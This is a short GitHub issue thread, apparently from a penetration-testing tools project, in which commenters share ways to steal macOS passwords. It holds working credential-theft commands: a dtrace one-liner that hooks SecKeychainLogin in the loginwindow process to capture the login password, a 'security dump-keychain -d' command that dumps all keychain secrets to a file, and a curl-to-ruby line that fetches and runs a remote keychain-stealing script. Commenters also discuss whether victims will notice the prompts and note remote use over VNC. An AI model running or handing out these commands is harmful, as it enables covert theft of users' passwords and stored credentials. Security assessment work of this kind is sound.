OS X Password sniffing #100
Comments
|
This is what I get: 😢 |
|
@OJ - It was on Twitter so it has to be true! Seriously though, the first command appears to work on my MBP:
And the second (dump the keychain) works too but pops up a "do you want this app to access your keychain" prompt for each cred that is being dumped. I'm VERY sure that users/victims will notice this.
|
|
hehe yeah sorry mate. I wasn't implying that it was you. I think it might rely on Yosemite (I'm still on Mavericks). Fun stuff though! |
|
No worries....good to know where it does/does not work too. I'm on 10.9.5 OS X |
|
Curl https://raw.githubusercontent.com/erran/keyjacker/master/keyjacker.rb | ruby Co worker Erran wrote this when he was like 16 or so. Still works pretty well on assessments. Again you need to click allow which means you need gui access but I have pulled that off remotely with vnc. Not super stealthy but gets the job done. Leon Johnson
|
Don't have time to add this in the appropriate place:
sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') (from https://twitter.com/fel1x/status/613420320104558592)
Dump whole OS X keychain: security dump-keychain -d login.keychain > keychain.txt && srm keychain.txt
The text was updated successfully, but these errors were encountered: